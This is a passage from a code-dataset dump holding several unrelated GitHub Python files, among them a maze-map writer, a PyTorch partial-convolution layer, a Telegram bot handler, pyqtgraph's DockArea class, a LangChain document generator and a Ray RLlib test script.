map_height = height*2+1\n    f = open(\"games/example/map1.tmx\", 'w')\n    # The XML template strings in the original writes were lost to extraction;\n    # what follows is a minimal TMX skeleton -- the tileset name, image source\n    # and tile sizes are placeholder assumptions, only the gid stream is real.\n    f.write('<?xml version=\"1.0\" encoding=\"UTF-8\"?>\\n')\n    f.write('<map version=\"1.0\" orientation=\"orthogonal\" width=\"%d\" height=\"%d\" tilewidth=\"32\" tileheight=\"32\">\\n' % (map_width, map_height))\n    f.write(' <tileset firstgid=\"1\" name=\"tiles\" tilewidth=\"32\" tileheight=\"32\">\\n')\n    f.write('  <image source=\"tiles.png\" width=\"512\" height=\"512\"/>\\n')\n    f.write(' </tileset>\\n')\n    f.write(' <layer name=\"maze\" width=\"%d\" height=\"%d\">\\n' % (map_width, map_height))\n    f.write('  <data>\\n')\n\n    tile_map_data = Maze.generate(width, height)._gid_matrix()\n    for i in tile_map_data:\n        data = '   <tile gid=\"%d\"/>\\n' % i\n        f.write(data)\n    f.write('  </data>\\n')\n    f.write(' </layer>\\n')\n    f.write('</map>\\n')\n\n    f.close()","repo_name":"kimjngyun/A4-PCG-MapGen","sub_path":"games/example/kruskal.py","file_name":"kruskal.py","file_ext":"py","file_size_in_byte":8766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74864554405","text":"import torch\nimport torch.nn.functional as F\nfrom torch import nn, cuda\nfrom torch.autograd import Variable\n\nclass PartialConv2d(nn.Module):\n    def __init__(self, in_channels, out_channels, kernel_size, stride=1, padding=1, bias=False, dilation=1, mask_channels=1):\n        super(PartialConv2d, self).__init__()\n\n        self.in_channels = in_channels\n        self.out_channels = out_channels\n        self.mask_channels = mask_channels\n        self.kernel_size = [kernel_size, kernel_size]\n        self.stride = stride\n        self.padding = padding\n        self.bias = bias\n        self.dilation = dilation\n\n        self.conv = nn.Conv2d(self.in_channels, self.out_channels, self.kernel_size, stride=self.stride, dilation=self.dilation, padding=self.padding, bias=self.bias)\n\n#        if self.mask_channels > 1:\n#            self.weight_maskUpdater = torch.ones(self.out_channels, self.mask_channels, self.kernel_size[0], self.kernel_size[1])\n#        else:\n        self.weight_maskUpdater = torch.ones(1, self.mask_channels, self.kernel_size[0], self.kernel_size[1])\n\n        self.slide_winsize = self.weight_maskUpdater.shape[1] * self.weight_maskUpdater.shape[2] * self.weight_maskUpdater.shape[3]\n\n        self.last_size = (None, None, None, None)\n        self.update_mask = None\n        self.mask_ratio = None\n\n    def forward(self, input, mask_in):\n        assert len(input.shape) == 4\n        self.last_size = tuple(input.shape)\n\n        with torch.no_grad():\n            if self.weight_maskUpdater.type() != input.type():\n                self.weight_maskUpdater = self.weight_maskUpdater.to(input)\n\n            mask = mask_in\n\n            self.update_mask = F.conv2d(mask, self.weight_maskUpdater, bias=None, stride=self.stride, padding=self.padding, dilation=self.dilation, groups=1)\n\n            # for mixed precision training, change 1e-8 to 1e-6\n            self.mask_ratio = self.slide_winsize/(self.update_mask + 1e-8)\n            # self.mask_ratio = torch.max(self.update_mask)/(self.update_mask + 1e-8)\n            self.update_mask = torch.clamp(self.update_mask, 0, 1)\n            self.mask_ratio = torch.mul(self.mask_ratio, self.update_mask)\n\n\n        if self.mask_channels > 1:\n            masked_img1 = torch.mul(input[:,:input.shape[1]//2,...], mask[:,0,...].unsqueeze(1))\n            masked_img2 = torch.mul(input[:,input.shape[1]//2:,...], mask[:,1,...].unsqueeze(1))\n            raw_out = self.conv(torch.cat((masked_img1, masked_img2), 1))\n        else:\n            raw_out = self.conv(torch.mul(input, mask))\n\n#        if self.bias is not None:\n#            bias_view = self.bias.view(1, self.out_channels, 1, 1)\n#            output = torch.mul(raw_out - bias_view, self.mask_ratio) + bias_view\n#            output = torch.mul(output, self.update_mask)\n#        else:\n        output = torch.mul(raw_out, self.mask_ratio)\n\n\n#        if self.return_mask:\n#            return output, self.update_mask\n#        else:\n        return output, self.update_mask\n 
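# A minimal smoke test for the layer above (added illustration; the shapes
# and the mask convention -- 1 for valid pixels, 0 for holes -- are inferred
# from the code, not taken from the original repository):
if __name__ == '__main__':
    layer = PartialConv2d(3, 8, kernel_size=3, stride=1, padding=1)
    img = torch.randn(2, 3, 32, 32)
    mask = (torch.rand(2, 1, 32, 32) > 0.25).float()
    out, updated_mask = layer(img, mask)
    assert out.shape == (2, 8, 32, 32)
    assert updated_mask.shape == (2, 1, 32, 32)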
","repo_name":"mintingchen/ECE285-Project","sub_path":"model/partconv2d.py","file_name":"partconv2d.py","file_ext":"py","file_size_in_byte":3033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74855036323","text":"from database.repository.chat_settings_repository import ChatSettingsRepository\nfrom database.repository.user_repository import UserRepository\nfrom aiogram import Bot, types\nfrom asyncio import gather\n\n\nasync def left_chat_member(\n message: types.Message,\n bot: Bot,\n user_repo: UserRepository,\n):\n chat_admins = await bot.get_chat_administrators(message.chat.id)\n if any(\n (i for i in chat_admins if all([i.user.id == bot.id, i.can_delete_messages]))\n ):\n chat_settings_repo = ChatSettingsRepository(user_repo.conn)\n chat_setting = await chat_settings_repo.get(message.chat.id)\n\n if chat_setting and chat_setting.IsNeedToDeleteServiceMessageOnLeave:\n await message.delete()\n else:\n gather(\n *[\n bot.send_message(\n i.user.id,\n f\"Please promote me to administrator in this chat: {message.chat.title}\\nAlso i need permission to delete messages.\",\n )\n for i in chat_admins\n ]\n )\n","repo_name":"Forevka/Aiogram.Captcha.Example","sub_path":"bot/handlers/messages/left_chat_member.py","file_name":"left_chat_member.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"52"} +{"seq_id":"1764038730","text":"# -*- coding: utf-8 -*-\nimport weakref\nfrom ..Qt import QtCore, QtGui\nfrom .Container import *\nfrom .DockDrop import *\nfrom .Dock import Dock\nfrom .. import debug as debug\nfrom ..python2_3 import basestring\n\n\nclass DockArea(Container, QtGui.QWidget, DockDrop):\n def __init__(self, temporary=False, home=None):\n Container.__init__(self, self)\n QtGui.QWidget.__init__(self)\n DockDrop.__init__(self, allowedAreas=['left', 'right', 'top', 'bottom'])\n self.layout = QtGui.QVBoxLayout()\n self.layout.setContentsMargins(0,0,0,0)\n self.layout.setSpacing(0)\n self.setLayout(self.layout)\n self.docks = weakref.WeakValueDictionary()\n self.topContainer = None\n self.raiseOverlay()\n self.temporary = temporary\n self.tempAreas = []\n self.home = home\n \n def type(self):\n return \"top\"\n \n def addDock(self, dock=None, position='bottom', relativeTo=None, **kwds):\n \"\"\"Adds a dock to this area.\n \n ============== =================================================================\n **Arguments:**\n dock The new Dock object to add. If None, then a new Dock will be \n created.\n position 'bottom', 'top', 'left', 'right', 'above', or 'below'\n relativeTo If relativeTo is None, then the new Dock is added to fill an \n entire edge of the window. If relativeTo is another Dock, then \n the new Dock is placed adjacent to it (or in a tabbed \n configuration for 'above' and 'below'). \n ============== =================================================================\n \n All extra keyword arguments are passed to Dock.__init__() if *dock* is\n None. 
\n \"\"\"\n if dock is None:\n dock = Dock(**kwds)\n \n \n ## Determine the container to insert this dock into.\n ## If there is no neighbor, then the container is the top.\n if relativeTo is None or relativeTo is self:\n if self.topContainer is None:\n container = self\n neighbor = None\n else:\n container = self.topContainer\n neighbor = None\n else:\n if isinstance(relativeTo, basestring):\n relativeTo = self.docks[relativeTo]\n container = self.getContainer(relativeTo)\n neighbor = relativeTo\n \n ## what container type do we need?\n neededContainer = {\n 'bottom': 'vertical',\n 'top': 'vertical',\n 'left': 'horizontal',\n 'right': 'horizontal',\n 'above': 'tab',\n 'below': 'tab'\n }[position]\n \n ## Can't insert new containers into a tab container; insert outside instead.\n if neededContainer != container.type() and container.type() == 'tab':\n neighbor = container\n container = container.container()\n \n ## Decide if the container we have is suitable.\n ## If not, insert a new container inside.\n if neededContainer != container.type():\n if neighbor is None:\n container = self.addContainer(neededContainer, self.topContainer)\n else:\n container = self.addContainer(neededContainer, neighbor)\n \n ## Insert the new dock before/after its neighbor\n insertPos = {\n 'bottom': 'after',\n 'top': 'before',\n 'left': 'before',\n 'right': 'after',\n 'above': 'before',\n 'below': 'after'\n }[position]\n #print \"request insert\", dock, insertPos, neighbor\n old = dock.container()\n container.insert(dock, insertPos, neighbor)\n dock.area = self\n self.docks[dock.name()] = dock\n if old is not None:\n old.apoptose()\n \n return dock\n \n def moveDock(self, dock, position, neighbor):\n \"\"\"\n Move an existing Dock to a new location. \n \"\"\"\n ## Moving to the edge of a tabbed dock causes a drop outside the tab box\n if position in ['left', 'right', 'top', 'bottom'] and neighbor is not None and neighbor.container() is not None and neighbor.container().type() == 'tab':\n neighbor = neighbor.container()\n self.addDock(dock, position, neighbor)\n \n def getContainer(self, obj):\n if obj is None:\n return self\n return obj.container()\n \n def makeContainer(self, typ):\n if typ == 'vertical':\n new = VContainer(self)\n elif typ == 'horizontal':\n new = HContainer(self)\n elif typ == 'tab':\n new = TContainer(self)\n return new\n \n def addContainer(self, typ, obj):\n \"\"\"Add a new container around obj\"\"\"\n new = self.makeContainer(typ)\n \n container = self.getContainer(obj)\n container.insert(new, 'before', obj)\n #print \"Add container:\", new, \" -> \", container\n if obj is not None:\n new.insert(obj)\n self.raiseOverlay()\n return new\n \n def insert(self, new, pos=None, neighbor=None):\n if self.topContainer is not None:\n self.topContainer.containerChanged(None)\n self.layout.addWidget(new)\n self.topContainer = new\n #print self, \"set top:\", new\n new._container = self\n self.raiseOverlay()\n #print \"Insert top:\", new\n \n def count(self):\n if self.topContainer is None:\n return 0\n return 1\n \n \n #def paintEvent(self, ev):\n #self.drawDockOverlay()\n \n def resizeEvent(self, ev):\n self.resizeOverlay(self.size())\n \n def addTempArea(self):\n if self.home is None:\n area = DockArea(temporary=True, home=self)\n self.tempAreas.append(area)\n win = TempAreaWindow(area)\n area.win = win\n win.show()\n else:\n area = self.home.addTempArea()\n #print \"added temp area\", area, area.window()\n return area\n \n def floatDock(self, dock):\n \"\"\"Removes *dock* from this DockArea and 
places it in a new window.\"\"\"\n area = self.addTempArea()\n area.win.resize(dock.size())\n area.moveDock(dock, 'top', None)\n \n \n def removeTempArea(self, area):\n self.tempAreas.remove(area)\n #print \"close window\", area.window()\n area.window().close()\n \n def saveState(self):\n \"\"\"\n Return a serialized (storable) representation of the state of\n all Docks in this DockArea.\"\"\"\n\n if self.topContainer is None:\n main = None\n else:\n main = self.childState(self.topContainer)\n\n state = {'main': main, 'float': []}\n for a in self.tempAreas:\n geo = a.win.geometry()\n geo = (geo.x(), geo.y(), geo.width(), geo.height())\n state['float'].append((a.saveState(), geo))\n return state\n \n def childState(self, obj):\n if isinstance(obj, Dock):\n return ('dock', obj.name(), {})\n else:\n childs = []\n for i in range(obj.count()):\n childs.append(self.childState(obj.widget(i)))\n return (obj.type(), childs, obj.saveState())\n \n \n def restoreState(self, state):\n \"\"\"\n Restore Dock configuration as generated by saveState.\n \n Note that this function does not create any Docks--it will only \n restore the arrangement of an existing set of Docks.\n \n \"\"\"\n \n ## 1) make dict of all docks and list of existing containers\n containers, docks = self.findAll()\n oldTemps = self.tempAreas[:]\n #print \"found docks:\", docks\n \n ## 2) create container structure, move docks into new containers\n if state['main'] is not None:\n self.buildFromState(state['main'], docks, self)\n \n ## 3) create floating areas, populate\n for s in state['float']:\n a = self.addTempArea()\n a.buildFromState(s[0]['main'], docks, a)\n a.win.setGeometry(*s[1])\n \n ## 4) Add any remaining docks to the bottom\n for d in docks.values():\n self.moveDock(d, 'below', None)\n \n #print \"\\nKill old containers:\"\n ## 5) kill old containers\n for c in containers:\n c.close()\n for a in oldTemps:\n a.apoptose()\n\n\n def buildFromState(self, state, docks, root, depth=0):\n typ, contents, state = state\n pfx = \" \" * depth\n if typ == 'dock':\n try:\n obj = docks[contents]\n del docks[contents]\n except KeyError:\n raise Exception('Cannot restore dock state; no dock with name \"%s\"' % contents)\n else:\n obj = self.makeContainer(typ)\n \n root.insert(obj, 'after')\n #print pfx+\"Add:\", obj, \" -> \", root\n \n if typ != 'dock':\n for o in contents:\n self.buildFromState(o, docks, obj, depth+1)\n obj.apoptose(propagate=False)\n obj.restoreState(state) ## this has to be done later?\n \n\n def findAll(self, obj=None, c=None, d=None):\n if obj is None:\n obj = self.topContainer\n \n ## check all temp areas first\n if c is None:\n c = []\n d = {}\n for a in self.tempAreas:\n c1, d1 = a.findAll()\n c.extend(c1)\n d.update(d1)\n \n if isinstance(obj, Dock):\n d[obj.name()] = obj\n elif obj is not None:\n c.append(obj)\n for i in range(obj.count()):\n o2 = obj.widget(i)\n c2, d2 = self.findAll(o2)\n c.extend(c2)\n d.update(d2)\n return (c, d)\n\n def apoptose(self):\n #print \"apoptose area:\", self.temporary, self.topContainer, self.topContainer.count()\n if self.topContainer.count() == 0:\n self.topContainer = None\n if self.temporary:\n self.home.removeTempArea(self)\n #self.close()\n\n def clear(self):\n docks = self.findAll()[1]\n for dock in docks.values():\n dock.close()\n \n ## PySide bug: We need to explicitly redefine these methods\n ## or else drag/drop events will not be delivered.\n def dragEnterEvent(self, *args):\n DockDrop.dragEnterEvent(self, *args)\n\n def dragMoveEvent(self, *args):\n 
DockDrop.dragMoveEvent(self, *args)\n\n    def dragLeaveEvent(self, *args):\n        DockDrop.dragLeaveEvent(self, *args)\n\n    def dropEvent(self, *args):\n        DockDrop.dropEvent(self, *args)\n\n\nclass TempAreaWindow(QtGui.QMainWindow):\n    def __init__(self, area, **kwargs):\n        QtGui.QMainWindow.__init__(self, **kwargs)\n        self.setCentralWidget(area)\n\n    def closeEvent(self, *args, **kwargs):\n        self.centralWidget().clear()\n        QtGui.QMainWindow.closeEvent(self, *args, **kwargs)\n","repo_name":"AOtools/soapy","sub_path":"soapy/pyqtgraph/dockarea/DockArea.py","file_name":"DockArea.py","file_ext":"py","file_size_in_byte":11309,"program_lang":"python","lang":"en","doc_type":"code","stars":69,"dataset":"github-code","pt":"52"} +{"seq_id":"70933460005","text":"import argparse\nimport os\nimport csv\n\n\ndef main(folder: str, input_file: str, timeUnit: str, dimensions: int) -> None:\n    hosts = dict()\n    if not os.path.exists(folder):\n        os.makedirs(folder)\n    with open(input_file, 'r') as f:  # open in read-only mode\n        data = csv.reader(f, delimiter=\" \")\n        number = 0\n        for row in data:\n            key = f'{number}'\n            hosts[key] = \"time,x,y,z\\n\"\n            for ii in range(len(row) // (dimensions + 1)):\n                i = ii * (dimensions + 1)\n                if dimensions == 2:\n                    hosts[key] = f'{hosts[key]}{row[i]},{row[i+1]},{row[i+2]},0.0\\n'\n                else:\n                    hosts[key] = f'{hosts[key]}{row[i]},{row[i + 1]},{row[i + 2]},{row[i+3]}\\n'\n            number += 1\n\n    for key in hosts.keys():\n        with open(os.path.join(folder, f'host[{key}].csv'), 'w') as out:\n            out.write(hosts[key])\n\nif __name__ == \"__main__\":\n    main('outputfolder', 'BonnMotionFile.csv', 's', 3)\n\n","repo_name":"cedrikschueler/PARRoT","sub_path":"Tools/BonnMotionToTraceFiles.py","file_name":"BonnMotionToTraceFiles.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"69803427685","text":"from langchain.document_loaders import PyMuPDFLoader\nfrom langchain.embeddings.openai import OpenAIEmbeddings\nfrom langchain.vectorstores import Chroma\nfrom langchain.text_splitter import SentenceTransformersTokenTextSplitter\nfrom langchain.prompts import PromptTemplate\nfrom langchain.docstore.document import Document\nfrom langchain.llms import OpenAI\nfrom langchain.chains import LLMChain\nfrom langchain.chains.summarize import load_summarize_chain\nfrom . import *\nfrom utils.nlp_trainers import LDATrainer\nimport asyncio\n\nclass ContextBasedGenerator:\n    def __init__(self, pdf_paths=None, k=5) -> None:\n        prompt_template = \"\"\"You are a document creator that creates html sections based on prompts and context, which shall provide details required for the job. \n        Context shall be provided in chunks: 'ctx number', 'total ctx' provide the current chunk number, and the total chunks to be received respectively. 'ctx summary' provides a short summary of all the context you are to receive. This shall be useful for any part of the document that needs summarising. You need to create valid, logical and visually pleasing html sections that will be later combined inside tags (externally provided) to form a complete html document. For ctx number = 1, you will need to add an introductory section before anything, and you must add a heading for the document. For ctx number = total ctx, you will need to add a conclusion section. Important: For all other ctx numbers, you cannot add these sections.\n        The context and the context summary are based on *people's* views on various topics: you must rephrase them as a new person's view. 
Do not copy them as-is. \n        You may include css, and up to 1 image in the html script. The image \"alt\" tag will be used as description for an image generation model to generate an image. \"src\" tag should be an empty string and description should be in English. Add images only if necessary or asked by prompt. Now create a document based on the context and prompt given below:\n        Context: {context}\n        Prompt: {prompt}\n        ctx number: {context_number}\n        total ctx: {total_context}\n        ctx summary: {context_summary}\n        html:\"\"\"\n        self.k = k\n        self.PROMPT = PromptTemplate(\n            template=prompt_template, input_variables=\n            [\"context\", \"prompt\", \"context_summary\", \"context_number\", \"total_context\"]\n        )\n        self.llm = OpenAI(model_name=\"text-davinci-003\", max_tokens=2950, temperature=0.0)\n        self.chain = LLMChain(llm=self.llm, prompt=self.PROMPT)\n        self.summary_chain = load_summarize_chain(self.llm, chain_type=\"map_reduce\")\n        self.text_splitter = SentenceTransformersTokenTextSplitter(chunk_size=1024, chunk_overlap=50)\n        if pdf_paths is not None:\n            self.generate_db_from_pdf(pdf_paths)\n\n    def generate_db_from_pdf(self, pdf_paths):\n        texts = []\n        titles = []\n        for pdf_path in pdf_paths:\n            loader = PyMuPDFLoader(pdf_path)\n            document = loader.load()\n            titles.append(document[0])\n            texts += self.text_splitter.split_documents(document)\n        self.max_search_len = len(texts)\n        self.texts = texts\n        self.titles = titles\n\n    @property\n    def db(self):\n        vectordb = Chroma.from_documents(documents=self.texts,\n                                         embedding=OpenAIEmbeddings())\n        return vectordb\n\n    def generate_chain_response(self, prompt):\n        docs = self.get_top_k_documents(prompt)\n        with open(\"docs.log\", \"w\") as f:\n            for doc in docs:\n                f.write(doc.page_content)\n                f.write(\"\\n===========\\n\")\n        print(\"Summarising documents\")\n        summary = self.summary_chain.run(docs)\n        print(\"Summarised documents: \", summary, \"========\", sep=\"\\n\")\n        inputs = [\n            {\n                \"context\": doc.page_content,\n                \"prompt\": prompt,\n                \"context_summary\": summary,\n                \"context_number\": idx,\n                \"total_context\": len(docs)\n            }\n            for doc, idx in zip(docs, range(1, len(docs)+1))]\n        gpt_response = self.chain.apply(inputs)\n        with open(\"gpt.log\", \"w\") as f:\n            for resp in gpt_response:\n                f.write(resp[\"text\"])\n                f.write(\"\\n============\\n\")\n        output = [resp[\"text\"] for resp in gpt_response]\n        output = \"\\n\" + \"\\n\".join(output) + \"\\n\"\n        return output\n\n    def get_top_k_documents(self, prompt):\n        assert self.db is not None, \"Database not initialized\"\n        k = self.k\n        prompt_result = self.db.similarity_search_with_score(prompt, k=k)\n\n        docs = []\n        for result in prompt_result:\n            score = result[1]\n            if score >= 0.5:\n                break\n            docs.append(result[0])\n\n        if len(docs) < 1:\n            print(\"No documents found with similarity score less than 0.5. 
Looking for generic results.\")\n            docs = self.get_generic_results()\n        else:\n            print(\"Found documents with similarity score less than 0.5: returning\")\n\n        return docs\n\n    def get_generic_results(self):\n        # TODO: optimize this\n        k = min(self.k, self.max_search_len)\n        # docs = self.db.max_marginal_relevance_search(\n        #     ' ', k=k, lambda_mult=0.0)\n        print(\"Creating prompts based on LDA keywords\")\n        text_list = [text.page_content for text in self.titles]\n        lda = LDATrainer(k, text_list, passes=10)\n        smart_queries = lda.make_smart_queries()\n        print(\"Queries: \", smart_queries, sep=\"\\n\")\n        docs = []\n        for query in smart_queries:\n            prompt_result = self.db.similarity_search_with_score(query, k=1)\n            for result in prompt_result:\n                score = result[1]\n                if score >= 0.5:\n                    break\n                docs.append(result[0])\n        print(\"returning generic results\")\n        return docs\n\n    async def summarise(self, texts):\n        return await self.summary_chain.arun(texts)\n\n    async def _generate_chain_response_from_inputs(self, inputs):\n        return await self.chain.aapply(inputs)\n","repo_name":"cybershiptrooper/llm_web_api_server","sub_path":"utils/chain_expt.py","file_name":"chain_expt.py","file_ext":"py","file_size_in_byte":6399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"893008663","text":"from src.d07.input_parser import *\nfrom src.d07.directory import *\n\n\ndef part1(input) -> str:\n    root = parse(input)\n    all_dirs = flat_dir_list(root.sub_directories)\n    dirs_sizes = [dir.get_total_size() for dir in all_dirs]\n    result = sum([size for size in dirs_sizes if size <= 100_000])\n    return str(result)\n\n\ntotal_filesystem_size = 70_000_000\nupdate_size = 30_000_000\n\n\ndef part2(input) -> str:\n    root = parse(input)\n\n    free_space = total_filesystem_size - root.get_total_size()\n    required_space = update_size - free_space\n\n    all_dirs = flat_dir_list(root.sub_directories)\n    dirs_sizes = [dir.get_total_size() for dir in all_dirs]\n    result = min([size for size in dirs_sizes if size >= required_space])\n    return str(result)\n\n\ndef flat_dir_list(dir_list: list[Directory]) -> list[Directory]:\n    sub_dirs = [flat_dir_list(dir.sub_directories)\n                for dir in dir_list if dir.sub_directories != []]\n    return [item for sublist in sub_dirs for item in sublist] + dir_list\n\n\ndef solve_d7():\n    with open('inputs/7.txt', 'r') as file_input:\n        print(part1(file_input))\n\n    with open('inputs/7.txt', 'r') as file_input:\n        print(part2(file_input))\n","repo_name":"Degover/aoc-2022--python","sub_path":"src/d07/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33512752963","text":"\"\"\"\ntest trained models\n\"\"\"\n\nimport argparse\nimport os\nimport numpy as np\nimport torch as th\nimport ray\nfrom ray import tune\nfrom ray.rllib.examples.env.parametric_actions_graph import ParametricActionsEdgeGraph\nfrom ray.rllib.examples.models.autoregressive_action_model import TorchEdgeAutoregressiveDiscreteActionModel\nfrom ray.rllib.agents.ppo import ddppo\nfrom ray.rllib.examples.models.autoregressive_action_dist import TorchGraphEdgeEmbDistribution_SP_with_stop\nfrom ray.rllib.models import ModelCatalog\nfrom ray.rllib.agents.ppo import DDPPOTrainer\n\n\n\n\n\nif __name__ == \"__main__\":\n\n    restore_path = \"\"\n\n    assert restore_path != \"\", \"must provide the location of a trained model\"\n\n    ModelCatalog.register_custom_model(\n 
\"autoedgeregressivedecouplediscretedgraph_model\",\n TorchEdgeAutoregressiveDiscreteActionModel)\n\n ModelCatalog.register_custom_action_dist(\n \"graph_edgeEmb_pretrained_with_stop_dist\", TorchGraphEdgeEmbDistribution_SP_with_stop)\n\n assert th.cuda.device_count() > 0, \"run with gpus\"\n print('running with gpu')\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--run\", type=str, default=\"DDPPO\")\n parser.add_argument(\"--ppo_alg\", type=str, default=\"dcppo\",\n choices=[\"ppo\", 'tppo', 'dcppo'])\n parser.add_argument(\"--num-cpus\", type=int, default=60)\n parser.add_argument(\"--num-gpus\", type=int, default=8)\n\n parser.add_argument(\"--as-test\", action=\"store_true\")\n parser.add_argument(\"--max_action\", type=int, default=20, help=\"the maximum episode length\")\n parser.add_argument(\"--filtration_order\", type=int, default=-2,\n help=\"-1 means the whole size, and -2 means k% nodes\")\n parser.add_argument(\"--alpha\", type=float, default=0, help=\"-1 means grid search\")\n parser.add_argument(\"--filtration_order_ratio\", type=float, default=0.3,\n help=\"the ration of number of filtrated graphs\")\n parser.add_argument(\"--stop-iters\", type=int, default=1000)\n parser.add_argument(\"--stop-timesteps\", type=int, default=1500000)\n parser.add_argument(\"--stop-reward\", type=float, default=50)\n parser.add_argument(\"--dataset\", type=str,\n default=\"example_15\",\n choices=[\"example_15\", \"example_50\", \"example_100\", \"ba_small_30\", \"ba_mixed\" ])\n parser.add_argument(\"--max_num_node\", type=int,\n default=15, help=\"maximum number of nodes in a single graph during training\")\n parser.add_argument(\"--max_num_edge\", type=int,\n default=54,\n help=\"maximum number of edges in a single graph during training (68 for ba_small)\")\n parser.add_argument(\"--with_stop_action\", type=bool, default=True, help=\"if the policy has stop action\")\n parser.add_argument(\"--with_SimulatedAnnealing\", type=bool, default=False,\n help=\"if the env use SA to decide to accept the current action or not\")\n parser.add_argument(\"--cwd-path\", type=str, default='./')\n parser.add_argument(\"--tasks-per-gpu\", type=int, default=1, help='how manys tasks on a single gpu')\n parser.add_argument(\"--gpus_per_instance\", type=int, default=1, help='how manys gpus on a single instance')\n parser.add_argument(\"--bs\", type=int, default=4096, help='batch size')\n parser.add_argument(\"--mini-bs\", type=int, default=128, help='minibatch batch size')\n parser.add_argument(\"--hidden_dim\", type=int, default=128, help='hidden_dim')\n parser.add_argument(\"--separate_vf_optimizer\", type=bool, default=True, help='separate_vf_optimizer or not')\n parser.add_argument(\"--disable_preprocessor_api\", type=bool, default=True, help='disable_preprocessor_api')\n parser.add_argument(\"--lr\", type=float, default=3e-4, help='learning rate')\n parser.add_argument(\"--dual_clip_param\", type=float, default=5, help='dual_clip_param')\n parser.add_argument(\"--kl_target\", type=float, default=0.4, help='dual_clip_param')\n\n # different robustness measure\n parser.add_argument(\"--attack_strategy\", type=str, default='degree', choices=['-1', 'degree', 'betweenness'])\n parser.add_argument(\"--break_tie\", type=str, default='inc_by_id', choices=['-1', 'inc_by_id', 'random', 'dec_by_id'])\n\n parser.add_argument(\"--robust-measure\", type=str, default='R', choices=['R', \"sr\", \"ac\"])\n parser.add_argument(\"--sequentialMode\", type=bool, default=True)\n 
parser.add_argument(\"--add-penality\", type=bool, default=False)\n\n parser.add_argument(\"--single-obj\", type=bool, default=True, help=\"True: only optimize robustness\")\n parser.add_argument(\"--second-obj-func\", type=str, default='ge', choices=['ge', 'le'], help=\"'ge': global efficiency\")\n parser.add_argument(\"--reward_scale\", type=float, default=1)\n parser.add_argument(\"--is_train\", type=bool, default=True, help=\"if false, disable reward penalty\")\n parser.add_argument(\"--test_num\", type=int, default=1, help=\"how many samples are tested\")\n parser.add_argument(\"--seed\", type=int, default=0)\n parser.add_argument(\"--no_savegraph_acs\", help=\"no savegraph and actions\", action='store_false')\n parser.add_argument(\"--is_test\", help=\"is_test\", action='store_false')\n\n\n args = parser.parse_args()\n\n if args.filtration_order == -2:\n try:\n max_node = int(args.dataset.split('_')[1])\n args.filtration_order = int(max_node * args.filtration_order_ratio)\n except:\n args.filtration_order = -1 # change to the maximum number of nodes\n print(f\"filtration_order is {args.filtration_order}\")\n\n if args.alpha == -1:\n args.alpha = tune.grid_search(list(np.linspace(0, 1, 51))[25:])\n\n # set the max_num_node and max_num_edge for the model ViewRequirement\n if args.dataset == 'ba_small':\n args.max_num_node = 20\n args.max_num_edge = 68\n elif args.dataset == 'ba_small_30':\n args.max_num_node = 30\n args.max_num_edge = 112\n elif args.dataset == 'example_15':\n args.max_num_node = 15\n args.max_num_edge = 54\n elif args.dataset == 'example_50':\n args.max_num_node = 50\n args.max_num_edge = 96 * 2\n elif args.dataset == 'ba_mixed':\n args.max_num_node = 200\n args.max_num_edge = 792\n elif args.dataset == 'example_100':\n args.max_num_node = 100\n args.max_num_edge = 196 * 2\n elif args.dataset == 'EU':\n args.max_num_node = 217\n args.max_num_edge = 320 * 2\n else:\n print('use the max_num_node/edge provided by the user')\n\n cwd_path = args.cwd_path\n print('cwd path', cwd_path)\n logdir = cwd_path #+ '/log'\n print(logdir)\n if not os.path.isdir(logdir):\n os.mkdir(logdir)\n\n ray.init(local_mode=False)\n tune.register_env(\"env\", ParametricActionsEdgeGraph)\n\n\n ModelCatalog.register_custom_action_dist(\n \"graph_edgeEmb_pretrained_with_stop_dist\", TorchGraphEdgeEmbDistribution_SP_with_stop)\n gpu_count = args.gpus_per_instance\n num_workers = gpu_count * args.tasks_per_gpu\n num_gpus = 0 # Driver GPU\n num_gpus_per_worker = float(1 / args.tasks_per_gpu) # (gpu_count - num_gpus) / (num_workers+3)\n num_envs_per_worker = 16\n num_cpus_per_worker = 1\n remote_worker_envs = False\n sgd_minibatch_size = args.mini_bs # tune.grid_search([256, 256]) ##tune.grid_search([32, 32])#32\n # train_batch_size = 256#4096#1024#tune.grid_search([2048, 4096])\n rollout_fragment_length = round(args.bs / num_workers / num_envs_per_worker)\n config = ddppo.DEFAULT_CONFIG.copy()\n\n config.update({\n \"env\": ParametricActionsEdgeGraph,\n \"env_config\": {\n \"filtration_order\": args.filtration_order,\n # tune.grid_search([14]), #tune.grid_search(list(range(6, 15))),\n \"max_action\": args.max_action,\n \"with_stop_action\": args.with_stop_action,\n \"with_SimulatedAnnealing\": args.with_SimulatedAnnealing,\n \"dataset_type\": args.dataset,\n \"max_num_node\": args.max_num_node,\n \"max_num_edge\": args.max_num_edge,\n \"robust_measure\": args.robust_measure,\n \"single_obj\": args.single_obj,\n \"second_obj_func\": args.second_obj_func,\n \"reward_scale\": args.reward_scale,\n 
